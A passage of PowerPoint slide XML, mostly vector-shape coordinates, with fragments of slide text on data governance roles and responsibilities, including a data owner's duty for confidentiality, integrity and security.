                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2382380" y="2251722"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2351621" y="2288184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2319502" y="2323388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2286063" y="2357285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2251354" y="2389860"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2215413" y="2421051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2178266" y="2450833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2139950" y="2479154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2100529" y="2505976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2060028" y="2531262"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2018487" y="2554973"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1975954" y="2577058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1932457" y="2597480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1888032" y="2616212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1842744" y="2633192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1796605" y="2648407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1749679" y="2661780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1701990" y="2673299"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1701990" y="2717114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1749031" y="2706344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1795373" y="2693822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1840966" y="2679598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1885784" y="2663698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1929790" y="2646159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1972945" y="2627020"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2015223" y="2606306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2056574" y="2584069"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2096973" y="2560332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2136394" y="2535136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2174786" y="2508516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2212124" y="2480513"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2248370" y="2451138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2283485" y="2420455"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2317432" y="2388489"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2350198" y="2355265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2381720" y="2320836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2411984" y="2285225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2440940" y="2248471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2468562" y="2210600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2494826" y="2171674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2519667" y="2131695"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2543073" y="2090724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2565006" y="2048776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2585428" y="2005914"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2604300" y="1962137"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2621597" y="1917509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2637282" y="1872056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2651315" y="1825815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2663672" y="1778812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2674302" y="1731086"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2896869" h="2943225">
                <a:moveTo>
                  <a:pt x="2674302" y="1215974"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2663672" y="1168120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2651315" y="1120965"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2637282" y="1074585"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2621597" y="1028992"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2604300" y="984224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2585428" y="940320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2565006" y="897318"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2543073" y="855256"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2519667" y="814158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2494826" y="774065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2468562" y="735012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2440940" y="697026"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2411984" y="660158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2381720" y="624446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2350198" y="589902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2317432" y="556590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2283485" y="524522"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2248370" y="493737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2212124" y="464273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2174786" y="436181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2136394" y="409473"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2096973" y="384200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2056574" y="360400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2015223" y="338086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1972945" y="317309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1929790" y="298107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1885784" y="280517"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1840966" y="264566"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1795373" y="250278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1749031" y="237718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1701990" y="226898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1701990" y="270840"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1749679" y="282409"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1796605" y="295833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1842744" y="311099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1888032" y="328129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1932457" y="346925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1975954" y="367411"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2018487" y="389559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2060028" y="413346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2100529" y="438708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2139950" y="465607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2178266" y="494017"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2215413" y="523887"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2251354" y="555167"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2286063" y="587844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2319502" y="621855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2351621" y="657161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2382380" y="693724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2411742" y="731507"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2439670" y="770470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2466111" y="810577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2491054" y="851776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2514422" y="894029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2536202" y="937298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2556345" y="981544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2574810" y="1026718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2591562" y="1072794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2606560" y="1119720"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2619756" y="1167472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2631122" y="1215974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2674302" y="1215974"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2896869" h="2943225">
                <a:moveTo>
                  <a:pt x="2896476" y="1447927"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2894927" y="1399781"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2891815" y="1351699"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2887154" y="1303731"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2880931" y="1255903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2873146" y="1208265"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2863824" y="1160868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2852940" y="1113751"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2840494" y="1066965"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2826499" y="1020533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2810954" y="974509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2793847" y="928928"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2775178" y="883856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2754960" y="839304"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2733192" y="795337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2709862" y="751992"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2684983" y="709307"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2658554" y="667334"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2622486" y="703783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2647810" y="745350"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2671610" y="787565"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2693873" y="830402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2714587" y="873823"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2733776" y="917778"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2751442" y="962215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2767558" y="1007122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2782138" y="1052436"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2795193" y="1098118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2806700" y="1144130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2816682" y="1190434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2825127" y="1236992"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2832036" y="1283741"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2837408" y="1330667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2841244" y="1377708"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2843555" y="1424838"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2844317" y="1472006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2843555" y="1519186"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2841244" y="1566316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2837408" y="1613357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2832036" y="1660283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2825127" y="1707032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2816682" y="1753590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2806700" y="1799894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2795193" y="1845906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2782138" y="1891588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2767558" y="1936902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2751442" y="1981809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2733776" y="2026246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2714587" y="2070201"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2693873" y="2113623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2671610" y="2156460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2647810" y="2198674"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2622486" y="2240229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2658554" y="2276678"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2684983" y="2234717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2709862" y="2192032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2733192" y="2148687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2754960" y="2104720"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2775178" y="2060168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2793847" y="2015096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2810954" y="1969516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2826499" y="1923491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2840494" y="1877060"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2852940" y="1830273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2863824" y="1783156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2873146" y="1735759"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2880931" y="1688122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2887154" y="1640293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2891815" y="1592326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2894927" y="1544243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2896476" y="1496098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2896476" y="1447927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1779" y="306451"/>
            <a:ext cx="554990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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-125">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="100">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Roles</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-110">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="175">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and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90">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Responsibilities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35779" y="760476"/>
            <a:ext cx="7703820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09342" y="1882292"/>
            <a:ext cx="12028805" cy="22085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7310" marR="57150">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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governance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policy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outlines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security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measures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will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used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safeguard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data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throughout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its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life.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250">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="12065" marR="5080">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
            </a:pP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Within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life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cycle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information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assets,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there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critical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institutional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governance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roles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for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monitoring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supervision.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They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include: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28038" y="5095494"/>
            <a:ext cx="6160135" cy="2441575"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6160134" h="2441575">
                <a:moveTo>
                  <a:pt x="0" y="406907"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2738" y="359466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10750" y="313628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23729" y="269700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41370" y="227989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63366" y="188798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89413" y="152435"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="119205" y="119205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152435" y="89413"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="188798" y="63366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="227989" y="41370"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="269700" y="23729"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313628" y="10750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="359466" y="2738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="406907" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5753100" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5800541" y="2738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5846379" y="10750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5890307" y="23729"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5932018" y="41370"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5971209" y="63366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6007572" y="89413"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6040802" y="119205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6070594" y="152435"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6096641" y="188798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6118637" y="227989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6136278" y="269700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6149257" y="313628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6157269" y="359466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6160008" y="406907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6160008" y="2034539"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6157269" y="2081981"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6149257" y="2127819"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6136278" y="2171747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6118637" y="2213458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6096641" y="2252649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6070594" y="2289012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6040802" y="2322242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6007572" y="2352034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5971209" y="2378081"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5932018" y="2400077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5890307" y="2417718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5846379" y="2430697"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5800541" y="2438709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5753100" y="2441447"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="406907" y="2441447"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="359466" y="2438709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313628" y="2430697"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="269700" y="2417718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="227989" y="2400077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="188798" y="2378081"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152435" y="2352034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="119205" y="2322242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89413" y="2289012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63366" y="2252649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41370" y="2213458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23729" y="2171747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10750" y="2127819"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2738" y="2081981"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2034539"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="406907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313558" y="6073292"/>
            <a:ext cx="5236210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0979" marR="5080" indent="-208915">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Take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he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tima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spon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ib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ity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data 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confidentiality,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integrity,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security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02051" y="4616196"/>
            <a:ext cx="4410710" cy="984885"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4410709" h="984885">
                <a:moveTo>
                  <a:pt x="4246372" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="164084" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="164083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="820419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5857" y="864059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22389" y="903261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48037" y="936466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="81242" y="962114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120444" y="978646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164084" y="984503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4246372" y="984503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4290011" y="978646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4329213" y="962114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4362418" y="936466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4388066" y="903261"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4404598" y="864059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4410456" y="820419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4410456" y="164083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4404598" y="120444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4388066" y="81242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4362418" y="48037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4329213" y="22389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4290011" y="5857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4246372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137405" y="4913503"/>
            <a:ext cx="153797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owner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83930" y="5095494"/>
            <a:ext cx="6160135" cy="2441575"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6160134" h="2441575">
                <a:moveTo>
                  <a:pt x="0" y="406907"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2738" y="359466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10750" y="313628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23729" y="269700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41370" y="227989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63366" y="188798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89413" y="152435"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="119205" y="119205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152435" y="89413"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="188798" y="63366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="227989" y="41370"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="269700" y="23729"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313628" y="10750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="359466" y="2738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="406908" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5753100" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5800541" y="2738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5846379" y="10750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5890307" y="23729"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5932018" y="41370"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5971209" y="63366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6007572" y="89413"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6040802" y="119205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6070594" y="152435"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6096641" y="188798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6118637" y="227989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6136278" y="269700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6149257" y="313628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6157269" y="359466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6160008" y="406907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6160008" y="2034539"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6157269" y="2081981"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6149257" y="2127819"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6136278" y="2171747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6118637" y="2213458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6096641" y="2252649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6070594" y="2289012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6040802" y="2322242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6007572" y="2352034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5971209" y="2378081"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5932018" y="2400077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5890307" y="2417718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5846379" y="2430697"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5800541" y="2438709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5753100" y="2441447"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="406908" y="2441447"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="359466" y="2438709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313628" y="2430697"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="269700" y="2417718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="227989" y="2400077"/>
